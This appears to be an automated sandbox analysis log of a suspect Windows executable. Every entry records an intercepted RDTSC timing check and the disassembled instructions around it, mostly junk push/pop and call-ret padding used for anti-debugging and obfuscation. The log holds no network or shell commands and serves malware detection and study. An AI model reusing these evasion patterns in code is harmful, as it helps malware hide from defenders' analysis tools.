Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F624 second address: 47F6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FFAEC5267DCh 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jc 00007FFAEC5267E2h 0x00000017 jnl 00007FFAEC5267DCh 0x0000001d pop eax 0x0000001e mov edi, dword ptr [ebp+122D34DEh] 0x00000024 push 00000003h 0x00000026 push eax 0x00000027 clc 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FFAEC5267D8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D3297h], edi 0x0000004b push 00000003h 0x0000004d je 00007FFAEC5267DCh 0x00000053 mov edi, dword ptr [ebp+122D3562h] 0x00000059 sub dword ptr [ebp+122D2923h], edi 0x0000005f push 84A31C5Bh 0x00000064 push edi 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F7BF second address: 47F7CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F7CF second address: 47F7D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F881 second address: 47F892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5291ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F892 second address: 47F8B3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFAEC5267D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov si, di 0x00000010 lea ebx, dword ptr [ebp+12455258h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007FFAEC5267D8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49283C second address: 492846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FFAEC5291A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4A065C second address: 4A0661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 460D92 second address: 460D9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FFAEC5291A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 460D9D second address: 460DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5267E1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FFAEC5267D6h 0x00000012 jc 00007FFAEC5267D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 460DC1 second address: 460E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007FFAEC5291D3h 0x00000013 pushad 0x00000014 ja 00007FFAEC5291A6h 0x0000001a jmp 00007FFAEC5291B3h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49E4C2 second address: 49E4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E7h 0x00000007 jnp 00007FFAEC5267D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49E4E7 second address: 49E4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49E4EF second address: 49E4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49E4F3 second address: 49E52C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FFAEC5291BBh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jng 00007FFAEC5291BCh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49E664 second address: 49E668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49E668 second address: 49E680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAEC5291AAh 0x0000000e push ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49E680 second address: 49E685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49ED43 second address: 49ED62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007FFAEC5291A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e jp 00007FFAEC5291A8h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 jns 00007FFAEC5291A6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49EE9F second address: 49EEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49EEA3 second address: 49EEC2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAEC5291A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FFAEC5291B1h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49F036 second address: 49F05B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFAEC5267F0h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49F4E0 second address: 49F4F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5291ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 49F4F1 second address: 49F4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4678DE second address: 4678E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4A04E6 second address: 4A04EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4A04EC second address: 4A04F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4A45AC second address: 4A45B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4A4A27 second address: 4A4A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFAEC5291A8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4A4B20 second address: 4A4B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4A77A3 second address: 4A77B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FFAEC5291A6h 0x00000009 jns 00007FFAEC5291A6h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4693E1 second address: 4693F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007FFAEC5267D6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jo 00007FFAEC5267E2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4693F8 second address: 4693FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4693FE second address: 469406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 469406 second address: 46940A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AAC26 second address: 4AAC47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAEC5267E1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jbe 00007FFAEC5267D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AAC47 second address: 4AAC51 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAEC5291A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AB20C second address: 4AB216 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFAEC5267DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AB355 second address: 4AB365 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FFAEC5291A6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AB365 second address: 4AB369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AECDF second address: 4AECFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAEC5291B3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AECFF second address: 4AED34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FFAEC5267D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jno 00007FFAEC5267EBh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AED34 second address: 4AED3E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAEC5291A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AED3E second address: 4AED43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AED43 second address: 4AED49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AED49 second address: 4AED65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+122D1B0Ch] 0x0000000e call 00007FFAEC5267D9h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AED65 second address: 4AED69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AED69 second address: 4AED88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jp 00007FFAEC5267DAh 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jl 00007FFAEC5267DCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AED88 second address: 4AEDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAEC5291B9h 0x0000000a jmp 00007FFAEC5291B3h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AEDAE second address: 4AEDB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AEF54 second address: 4AEF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AF170 second address: 4AF174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AFA7F second address: 4AFA85 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AFA85 second address: 4AFA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AFA8B second address: 4AFB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jmp 00007FFAEC5291ABh 0x00000010 jmp 00007FFAEC5291B7h 0x00000015 popad 0x00000016 pop esi 0x00000017 xchg eax, ebx 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FFAEC5291A8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 jg 00007FFAEC5291ACh 0x00000038 jmp 00007FFAEC5291AFh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 je 00007FFAEC5291A8h 0x00000046 push eax 0x00000047 pop eax 0x00000048 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AFD37 second address: 4AFD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AFD3C second address: 4AFD55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AFEFA second address: 4AFF0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4AFF0A second address: 4AFF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B00B7 second address: 4B00BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B06BC second address: 4B06C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B1825 second address: 4B1829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B4064 second address: 4B4068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B4D7D second address: 4B4D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B54F8 second address: 4B54FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B54FE second address: 4B5502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B5F66 second address: 4B5F7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B87C9 second address: 4B87CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B974E second address: 4B9752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4B5F7E second address: 4B5F83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BA460 second address: 4BA47A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAEC5291ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FFAEC5291ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BA47A second address: 4BA4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007FFAEC5267D8h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 push 00000000h 0x00000022 jmp 00007FFAEC5267E5h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FFAEC5267D8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 movzx edi, dx 0x00000046 movzx edi, bx 0x00000049 xchg eax, esi 0x0000004a jng 00007FFAEC5267ECh 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FFAEC5267DEh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BD4DB second address: 4BD4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BB72A second address: 4BB744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BD4DF second address: 4BD50E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B4h 0x00000007 jmp 00007FFAEC5291B3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BA746 second address: 4BA74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BB744 second address: 4BB760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BA74B second address: 4BA76C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007FFAEC5267D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FFAEC5267DCh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BB760 second address: 4BB765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BDA3A second address: 4BDA86 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAEC5267D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FFAEC5267E1h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FFAEC5267D8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D21E6h], edi 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BE863 second address: 4BE869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BE869 second address: 4BE86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BE86D second address: 4BE884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007FFAEC5291B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FFAEC5291A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4BE884 second address: 4BE888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
